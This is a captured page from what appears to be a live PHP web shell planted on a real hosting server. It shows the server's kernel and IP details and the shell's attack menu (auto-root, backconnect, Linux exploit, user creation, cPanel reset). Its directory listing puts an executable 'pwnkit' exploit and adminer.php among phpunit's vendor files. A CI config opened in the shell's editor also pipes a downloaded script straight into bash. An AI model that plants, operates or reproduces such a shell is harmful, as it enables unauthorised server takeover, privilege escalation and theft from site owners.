Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.54
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
vendor /
phpunit /
phpunit /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.editorconfig
115
B
-rw-r--r--
.gitattributes
38
B
-rw-r--r--
.gitignore
315
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.php_cs.dist
6.5
KB
-rw-r--r--
.travis.yml
2.05
KB
-rw-r--r--
ChangeLog-6.5.md
3.29
KB
-rw-r--r--
ChangeLog-7.0.md
3.06
KB
-rw-r--r--
ChangeLog-7.1.md
2.26
KB
-rw-r--r--
LICENSE
1.51
KB
-rw-r--r--
README.md
2.63
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
appveyor.yml
2.3
KB
-rw-r--r--
build.xml
18.61
KB
-rw-r--r--
composer.json
2.2
KB
-rw-r--r--
phpstan-tests.neon
897
B
-rw-r--r--
phpstan.neon
316
B
-rw-r--r--
phpunit
1.25
KB
-rw-r--r--
phpunit.xml
1.03
KB
-rw-r--r--
phpunit.xsd
13.42
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php sudo: false addons: apt: packages: - libxml2-utils php: - 7.1 - 7.2 - master matrix: allow_failures: - php: master fast_finish: true env: matrix: - DEPENDENCIES="high" - DEPENDENCIES="low" global: - DEFAULT_COMPOSER_FLAGS="--no-interaction --no-ansi --no-progress --no-suggest" before_install: - ./build/tools/composer clear-cache install: - if [[ "$DEPENDENCIES" = 'high' ]]; then travis_retry ./build/tools/composer update $DEFAULT_COMPOSER_FLAGS; fi - if [[ "$DEPENDENCIES" = 'low' ]]; then travis_retry ./build/tools/composer update $DEFAULT_COMPOSER_FLAGS --prefer-lowest; fi before_script: - echo 'zend.assertions=1' >> ~/.phpenv/versions/$(phpenv version-name)/etc/conf.d/travis.ini - echo 'assert.exception=On' >> ~/.phpenv/versions/$(phpenv version-name)/etc/conf.d/travis.ini script: - ./phpunit --coverage-clover=coverage.xml - ./phpunit --configuration ./build/travis-ci-fail.xml > /dev/null; if [ $? -eq 0 ]; then echo "SHOULD FAIL"; false; else echo "fail checked"; fi; - xmllint --noout --schema phpunit.xsd phpunit.xml - xmllint --noout --schema phpunit.xsd tests/_files/configuration.xml - xmllint --noout --schema phpunit.xsd tests/_files/configuration_empty.xml - xmllint --noout --schema phpunit.xsd tests/_files/configuration_xinclude.xml -xinclude after_success: - bash <(curl -s https://codecov.io/bash) notifications: email: false jobs: include: - stage: Static Code Analysis php: 7.2 env: PHPStan before_install: - travis_retry composer require --dev --no-update phpstan/phpstan:^0.9 install: travis_retry composer update --prefer-dist --prefer-stable script: - vendor/bin/phpstan analyse --level=0 -c phpstan.neon src - vendor/bin/phpstan analyse --level=1 -c phpstan-tests.neon tests - stage: Static Code Analysis php: 7.2 env: php-cs-fixer install: - phpenv config-rm xdebug.ini script: - ./build/tools/php-cs-fixer fix --dry-run -v --show-progress=dots --diff-format=udiff
Close